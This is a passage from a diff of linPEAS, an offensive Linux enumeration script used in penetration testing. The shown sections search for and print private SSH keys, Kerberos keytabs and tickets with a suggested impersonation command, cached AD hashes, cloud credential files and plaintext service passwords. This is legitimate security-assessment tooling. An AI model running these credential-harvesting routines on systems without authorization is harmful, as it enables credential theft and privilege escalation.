/etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi echo "" - - #-- SI) NFS exports - print_2title "NFS exports?" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" - if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," - else echo_not_found "/etc/exports" - fi +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" - #-- SI) Kerberos - print_2title "Searching kerberos conf files and tickets" - print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" - kadmin_exists="$(command -v kadmin)" - klist_exists="$(command -v klist)" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi - if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; - fi +#-- SI) PAM auth +print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" +pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) +if [ "$pamssh" ]; then + grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" - printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do - if [ -r "$f" ]; then - if echo "$f" | grep -q .k5login; then - echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - elif echo "$f" | grep -q keytab; then - echo "" - echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" - printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do - if [ "$l" ] && echo "$l" | grep -q "@"; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that - fi - done - elif echo "$f" | grep -q krb5.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; - elif echo "$f" | grep -q kadm5.acl; then - ls -l "$f" - cat "$f" 2>/dev/null - elif echo "$f" | grep -q sssd.conf; then - ls -l "$f" - cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; - elif echo "$f" | grep -q secrets.ldb; then - echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - elif echo "$f" | grep -q .secrets.mkey; then - echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; - ls -l "$f" - fi +#-- SI) NFS exports +print_2title "NFS exports?" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" +if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," +else echo_not_found "/etc/exports" +fi +echo "" + +#-- SI) Kerberos +print_2title "Searching kerberos conf files and tickets" +print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi +if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; +fi + +printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if echo "$f" | grep -q .k5login; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + elif echo "$f" | grep -q keytab; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif echo "$f" | grep -q krb5.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif echo "$f" | grep -q kadm5.acl; then + ls -l "$f" + cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" fi - done - ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" - klist 2>/dev/null || echo_not_found "klist" - echo "" + fi +done +ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" +klist 2>/dev/null || echo_not_found "klist" +echo "" - print_2title "Analyzing Knockd Files (limit 70)" + print_2title "Analyzing Knockd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Kibana Files (limit 70)" + print_2title "Analyzing Kibana Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Elasticsearch Files (limit 70)" + print_2title "Analyzing Elasticsearch Files (limit 70)" echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; - ##-- SI) Logstash - print_2title "Searching logstash files" - if [ "$PSTORAGE_LOGSTASH" ]; then - printf "$PSTORAGE_LOGSTASH\n" - printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do - if [ -r "$d/startup.options" ]; then - echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," - fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," - done - else echo_not_found - fi - echo "" +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +else echo_not_found +fi +echo "" - #-- SI) Vault-ssh - print_2title "Searching Vault-ssh files" - if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then - printf "$PSTORAGE_VAULT_SSH_HELPER\n" - printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done - echo "" - vault secrets list 2>/dev/null - printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - else echo_not_found "vault-ssh-helper.hcl" - fi +#-- SI) Vault-ssh +print_2title "Searching Vault-ssh files" +if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +else echo_not_found "vault-ssh-helper.hcl" +fi +echo "" - #-- SI) Cached AD Hashes - adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) - print_2title "Searching AD cached hashes" - if [ "$adhashes" ]; then - ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null - else echo_not_found "cached hashes" - fi - echo "" +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +print_2title "Searching AD cached hashes" +if [ "$adhashes" ]; then + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null +else echo_not_found "cached hashes" +fi +echo "" - #-- SI) Screen sessions - print_2title "Searching screen sessions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - screensess=$(screen -ls 2>/dev/null) - if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," - else echo_not_found "screen" - fi - echo "" +#-- SI) Screen sessions +print_2title "Searching screen sessions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +screensess=$(screen -ls 2>/dev/null) +if [ "$screensess" ]; then + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," +else echo_not_found "screen" +fi +echo "" - #-- SI) Tmux sessions - tmuxdefsess=$(tmux ls 2>/dev/null) - tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) - print_2title "Searching tmux sessions"$N - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" - if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," - else echo_not_found "tmux" - fi - echo "" +#-- SI) Tmux sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +print_2title "Searching tmux sessions"$N +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," +else echo_not_found "tmux" +fi +echo "" - print_2title "Analyzing CouchDB Files (limit 70)" + print_2title "Analyzing CouchDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Redis Files (limit 70)" + print_2title "Analyzing Redis Files (limit 70)" if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; - #-- SI) Dovecot - # Needs testing - print_2title "Searching dovecot files" - dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then - echo_not_found "dovecot credentials" - else - for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do - df=$(echo $d |cut -d ':' -f1) - dp=$(echo $d |cut -d ':' -f2-) - echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null - done - fi - echo "" +#-- SI) Dovecot +# Needs testing +print_2title "Searching dovecot files" +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" +else + for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done +fi +echo "" - print_2title "Analyzing Mosquitto Files (limit 70)" + print_2title "Analyzing Mosquitto Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Neo4j Files (limit 70)" + print_2title "Analyzing Neo4j Files (limit 70)" if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Cloud Credentials Files (limit 70)" + print_2title "Analyzing Cloud Credentials Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; @@ -2824,112 +2786,112 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then echo_not_found ".bluemix"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; for ff in $(find "$f" -name "config.json"); do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Cloud Init Files (limit 70)" + print_2title "Analyzing Cloud Init Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; - print_2title "Analyzing CloudFlare Files (limit 70)" + print_2title "Analyzing CloudFlare Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; - print_2title "Analyzing Erlang Files (limit 70)" + print_2title "Analyzing Erlang Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing GMV Auth Files (limit 70)" + print_2title "Analyzing GMV Auth Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing IPSec Files (limit 70)" + print_2title "Analyzing IPSec Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing IRSSI Files (limit 70)" + print_2title "Analyzing IRSSI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Keyring Files (limit 70)" + print_2title "Analyzing Keyring Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Filezilla Files (limit 70)" + print_2title "Analyzing Filezilla Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then echo_not_found "filezilla"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Backup Manager Files (limit 70)" + print_2title "Analyzing Backup Manager Files (limit 70)" if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read 